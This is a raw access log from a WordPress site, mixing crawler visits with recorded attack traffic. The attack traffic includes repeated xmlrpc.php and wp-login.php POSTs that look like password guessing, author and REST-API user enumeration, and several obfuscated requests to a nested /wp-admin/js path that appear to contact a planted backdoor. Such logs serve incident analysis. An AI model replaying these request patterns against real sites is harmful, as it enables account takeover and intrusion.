193.142.147.5 - - [20/Oct/2025:10:21:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
154.53.62.61 - - [20/Oct/2025:10:21:10 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:21:11 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:11 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:11 -0400] "GET /lose-weight-with-having-raisin/lose-weight2/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
57.159.28.36 - - [20/Oct/2025:10:21:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:10:21:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7092 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:10:21:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:10:21:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "-" "Mozilla/5.0"
193.142.147.5 - - [20/Oct/2025:10:21:13 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
57.159.28.36 - - [20/Oct/2025:10:21:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:10:21:13 -0400] "POST /wp-login.php HTTP/2.0" 200 7137 "-" "Mozilla/5.0"
216.73.216.143 - - [20/Oct/2025:10:21:12 -0400] "GET /lose-weight-with-having-raisin/lose-weight2/feed/ HTTP/2.0" 200 820 "https://hindi.blushin.com/lose-weight-with-having-raisin/lose-weight2/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
154.53.62.61 - - [20/Oct/2025:10:21:13 -0400] "POST /wp-login.php HTTP/2.0" 200 7096 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:21:14 -0400] "GET /tag/importance-of-bangles-in-womens-life HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:15 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:16 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:15 -0400] "GET /tag/importance-of-bangles-in-womens-life/ HTTP/2.0" 200 150430 "https://hindi.blushin.com/tag/importance-of-bangles-in-womens-life" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:17 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:21:16 -0400] "GET /tips-to-get-rid-of-moles/ HTTP/2.0" 200 322363 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:18 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:20 -0400] "GET /know-how-lotus-seeds-protect-your-body-from-various-diseases/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:10:21:21 -0400] "GET /know-how-lotus-seeds-protect-your-body-from-various-diseases/feed/ HTTP/2.0" 200 1018 "https://hindi.blushin.com/know-how-lotus-seeds-protect-your-body-from-various-diseases/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:23 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:23 -0400] "GET /tag/trendy-tree-snowman-wreath/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:10:18:58 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333533382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393933382q6131396266383031626565313138643232393166383963363730316432393836222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:10:21:24 -0400] "GET /tag/trendy-tree-snowman-wreath/feed/ HTTP/2.0" 200 10879 "https://hindi.blushin.com/tag/trendy-tree-snowman-wreath/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
2a03:2880:f800:2b:: - - [20/Oct/2025:10:21:25 -0400] "GET /?p=34204 HTTP/2.0" 301 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
193.142.147.5 - - [20/Oct/2025:10:21:27 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:26 -0400] "GET /tag/baby-sleep-basics/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:28 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:27 -0400] "GET /tag/baby-sleep-basics/feed/ HTTP/2.0" 200 25128 "https://hindi.blushin.com/tag/baby-sleep-basics/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
114.119.145.88 - - [20/Oct/2025:10:21:28 -0400] "GET /7-things-girls-do-after-breakup/7-things-girls-do-after-breakup7/ HTTP/2.0" 200 150950 "https://hindi.blushin.com/attachment-sitemap13.xml" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
2a03:2880:f800:34:: - - [20/Oct/2025:10:21:28 -0400] "GET /signs-for-health-hair/attachment/35/ HTTP/2.0" 200 150351 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
154.53.62.61 - - [20/Oct/2025:10:21:30 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:21:30 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
154.53.62.61 - - [20/Oct/2025:10:21:30 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:21:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
162.0.210.133 - - [20/Oct/2025:10:21:32 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:21:32 -0400] "GET /tag/how-to-get-beautiful-hair-naturally-at-home/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.0.210.133 - - [20/Oct/2025:10:21:33 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:21:33 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:33 -0400] "GET /tag/how-to-get-beautiful-hair-naturally-at-home/feed/ HTTP/2.0" 200 12820 "https://hindi.blushin.com/tag/how-to-get-beautiful-hair-naturally-at-home/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:35 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:35 -0400] "GET /tips-to-keep-children-safe-in-summers HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:36 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:36 -0400] "GET /tips-to-keep-children-safe-in-summers/ HTTP/2.0" 200 315213 "https://hindi.blushin.com/tips-to-keep-children-safe-in-summers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:38 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:40 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:41 -0400] "GET /tag/gauge-the-love-quotient-in-your-relationship/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:42 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:42 -0400] "GET /tag/gauge-the-love-quotient-in-your-relationship/feed/ HTTP/2.0" 200 18805 "https://hindi.blushin.com/tag/gauge-the-love-quotient-in-your-relationship/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:44 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:46 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:19:20 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333536302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393936302q3533313339653538373664653065396134303039646230336362663164613436222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:10:21:47 -0400] "GET /tag/benefits-of-applying-coconut-oil-on-face-overnight/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:50 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:51 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:48 -0400] "GET /tag/benefits-of-applying-coconut-oil-on-face-overnight/feed/ HTTP/2.0" 200 27434 "https://hindi.blushin.com/tag/benefits-of-applying-coconut-oil-on-face-overnight/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:53 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:53 -0400] "GET /tag/free-from-disease-4-letters/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:54 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:54 -0400] "GET /tag/free-from-disease-4-letters/feed/ HTTP/2.0" 200 25282 "https://hindi.blushin.com/tag/free-from-disease-4-letters/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:21:56 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:58 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:21:59 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:21:58 -0400] "GET /how-to-get-rid-of-hair-odor/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
2a03:2880:2ff:43:: - - [20/Oct/2025:10:21:59 -0400] "GET /home-remedies-to-remove-legs-tanning.html HTTP/2.0" 404 164295 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
2a03:2880:2ff:4:: - - [20/Oct/2025:10:21:59 -0400] "GET /home-remedies-to-remove-legs-tanning.html HTTP/2.0" 404 164295 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
193.142.147.5 - - [20/Oct/2025:10:22:01 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:22:01 -0400] "GET /how-to-get-rid-of-hair-odor/feed/ HTTP/2.0" 200 933 "https://hindi.blushin.com/how-to-get-rid-of-hair-odor/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
87.98.128.54 - - [20/Oct/2025:10:22:02 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; LCJB)"
87.98.128.54 - - [20/Oct/2025:10:22:03 -0400] "POST /wp-login.php HTTP/2.0" 200 7145 "https://hindi.blushin.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; LCJB)"
193.142.147.5 - - [20/Oct/2025:10:22:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:22:04 -0400] "GET /author/kh2/page/2 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:10:22:05 -0400] "GET /author/kh2/page/2/ HTTP/2.0" 200 191501 "https://hindi.blushin.com/author/kh2/page/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:22:07 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:22:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:19:42 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333538322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393938322q6331306232633061303639326465393230643163373032303834303363353733222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:22:09 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
223.193.38.237 - - [20/Oct/2025:10:22:11 -0400] "GET /wp-content/uploads/2017/08/Run-in-the-rain.jpg HTTP/2.0" 200 63519 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:22:11 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:22:12 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:22:12 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
193.142.147.5 - - [20/Oct/2025:10:22:14 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:22:15 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:22:17 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:22:19 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
196.251.85.75 - - [20/Oct/2025:10:22:18 -0400] "GET / HTTP/2.0" 200 229596 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:22:20 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
196.251.85.75 - - [20/Oct/2025:10:22:21 -0400] "GET //wp-includes/wlwmanifest.xml HTTP/2.0" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:22 -0400] "GET //xmlrpc.php?rsd HTTP/2.0" 200 816 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:22 -0400] "GET //?author=1 HTTP/2.0" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:22:24 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
196.251.85.75 - - [20/Oct/2025:10:22:24 -0400] "GET //?author=2 HTTP/2.0" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:25 -0400] "GET //wp-json/wp/v2/users/ HTTP/2.0" 200 8088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:26 -0400] "POST //xmlrpc.php HTTP/2.0" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:27 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:22:27 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
196.251.85.75 - - [20/Oct/2025:10:22:27 -0400] "POST //xmlrpc.php HTTP/2.0" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:22:28 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
